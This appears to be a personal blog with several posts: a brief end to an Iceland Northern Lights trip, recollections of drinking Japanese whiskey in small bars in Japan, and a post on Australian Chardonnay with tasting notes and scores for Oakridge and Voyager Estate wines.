Finally, and probably what most people come to Iceland for, the awe inspiring Northern Lights or Aurora Boreali. Unfortunately not having a decent camera on hand the photos I took cannot do it justice. But I would whole heartily encourage everyone to make the trip to see these breathtaking lights in the sky!

OLYMPUS DIGITAL CAMERA

More trips to follow!

Whiskey in the land of the rising sun

When I first came to Japan in around 2006, it was for just a breif 4 night stop over on my way back from the US. I was young and even more naive back then (now I’m older but probably just as naive) and I did not appreciate whiskies as much as I do now. However I had read about some Japanese whiskey and was keen to try some whilst in Japan. Also back then finding aged Japanese whiskey was relatively simple, it could even be found in the local electrical goods store?!

At this point my experience with whiskey was largely limited to those produced in Scotland and Ireland, and given my budget, I tended to drink what was perhaps not the best representation from these locations.

Whilst I do not think that whiskey needs to be aged or expensive to be good, just like wine, there are some very good cheap, young examples, however given my knowledge on the subject I’d perhaps not yet had the understanding to seek these examples out.

Anyway, as I mentioned I was in Japan for a few days and intent on trying some of the local whiskeys. I didn’t have it in mind at the time to buy any bottles but rather wanted to find some little hidden bars where I could sample a variety of what Japan had to offer. To my surprise the bars offered some very good aged local whiskey at a very reasonable price. The rest is slightly blurred… with time obviously.

On my next visit to Japan a few years later, recalling the great experience I had, I decided to buy a couple bottles of whiskey, which from memory were the 21yo Nikka Pure Malt and a 18yo Yamazaki, which I believe cost me around $100 to $150AUD at the time.

pixlr_20171117133456574

After drinking these in Aus with some friends, also along with some good Scotch, it became apparent how good these Japanese whiskies were. On subsequent trips to Japan I always tired to take some time to explore and find a bar, to try some local whiskey. I also discovered that the owners of these bars, who were typically the same person serving the whiskey, were very interesting characters. It somehow seemed possible to share our passion for whiskey despite the language barrier, perhaps after a few glasses it became easier, or just perhaps the primal incoherence of whiskey addled humans is universal.

More recently, from around 2014 Japan whiskey was very popular globally and unfortunately finding those cheap ages bottle became very hard, and typically very expensive. However for those of us, determined they can still be found in some small bars which still pour great old whisky for a reasonable price.

A recent example of this, is my last couple of trips to Japan were I found these on offer. Which are obviously not local but when Japanese whiskey is not available some old and unique bottles of Scotch can still be found such as these:

20161005_165026

Japan has a warm place in my heart, and not just from the whiskey, but as a place were a little dark bar which only seats about 10 people, can be found situated in the middle of the city, on a crowded streets filled with lights and high rise buildings, and the owner is still pouring whiskey at prices representative of what they were when he bought the bottles many years ago.

Chardy Season

I’ll admit it, I’m a big fan of Chardonnay! I think it is one of the worlds best white wine grapes (I might prefer French/German Riesling?) but perhaps for Australia, the best white wine grape.

However for Australia specifically it has not always been so…

Back in the late 90’s early 2000’s when I was getting into wine a bit more seriously I started drinking chardonnay, as at that time, and I believe is still true now, it is Australia’s most widely planted, consumed and exported white variety. However, it was around this time that a lot of Australian chardonnays were not very good, in fact they were pretty bad.

In the late 80s, and early 90s, demand for chardonnay exceeded supply. Most of the fruit, was grown in warmer climates and became exceedingly oak treated leading to strong, simple and heavy, buttery, or sometimes caramel-like, flavor, which most wine drinkers, including myself, did not like, and thus stopped consuming. This in turn, in the early 2000s sparked off the “unwooded” chardonnay trend, which were notable for their blandness, and to my mind, confirmed that most Australian chardonnays were not very good.

That said, obviously during this time there were still some good, if not great chardonnays being produced, from producers such as Giaconda, Penfolds, Leeuwin Estate, Voyager Estate and others but for the most part these were top end chardonnays, mostly outside of my price range, and not worth the gamble.

However, I remember getting a bottle of 1997 Voyager Estate Margaret River Chardonnay as a gift, which I kept in the cupboard in the center of the house for many years, as I initially was not too interested in wine at this stage. A few years later a friend of mine and I shared a bottle of 2003 Voyager Estate Chardonnay. I was blown away by how good it was, intense melon, nectarine, pineapple, with well integrated quality French oak. I went back and opened that 1997 Voyager Estate Chardonnay and it still showed some primary fruit flavors such as pear, and fig, but also had developed creamy, hazelnut, toffee, (Crème Brulee), secondary flavors. This inspired my love for chardonnay which I still drink a lot of to this day.

Thankfully in the last 15 or so years, chardonnay has become one of Australia’s best grape varietals and my love of this grape has never been stronger.

Thus as the warmer seasons are now upon us, what better excuse (surely no excuses are needed) to drink some of my favorite Australian chardonnay. Thus lets start with the Oakridge Local Vineyard Series Guerin Vineyard Chardonnay 2013 and a Voyager Estate Chardonnay 2006.

aus-chardy

Oakridge make a lot of great Pinot and Chardonnay and are situated in Victoria’s Yarra Valley which is known for producing great examples of both these great varieties. It is one of Australia’s oldest wine regions, dating back to the mid 1800’s.

The Oakridge LVS Guerin Vineyard Chardonnay 2013 is whole bunch pressed, matured on lees and then put into 500 litre French oak puncheons for 11 months. It has a distinctive Oakridge perfume and taste (which is a good thing) with nectarine and pear on the nose which are also reflected on the palette with added citrus and spice and a touch of flint and cashew. It has a slight straw almost with a hint of green colour to it and is still tight  but delivers on flavour and mouth feel, with enough complexity to keep for another 5 years.

In summary a great example of Yarra Valley Chardonnay and with the LVS being Oakridge’s mid range wines a reasonable price. – Score: 96/100.

The Voyager Estate Chardonnay 2006 is one that has been sitting in my cellar for about 8 years and thus obviously has more age to it, but it is singing right now.

It has that Margaret River typical grapefruit and citrus bouquet. The taste also showed grapefruit and citrus with a touch of vanilla, and pear. The texture was light, well balanced and creamy, with well integrated acid and a long and buttery finish with a touch of minerality and honeysuckle. – Score: 96/100.

I drank both these wines over two nights and whilst both wines are great examples of the chardonnay which Australia is now producing I felt the Voyager Estate definitely benefited from a little longer bottle age to allow it to slightly mellow, whilst the Oakridge shone on the second night.

Anyway I am getting thirsty thinking about these two great chardys and am already looking over at my wine fridge to see what will be next.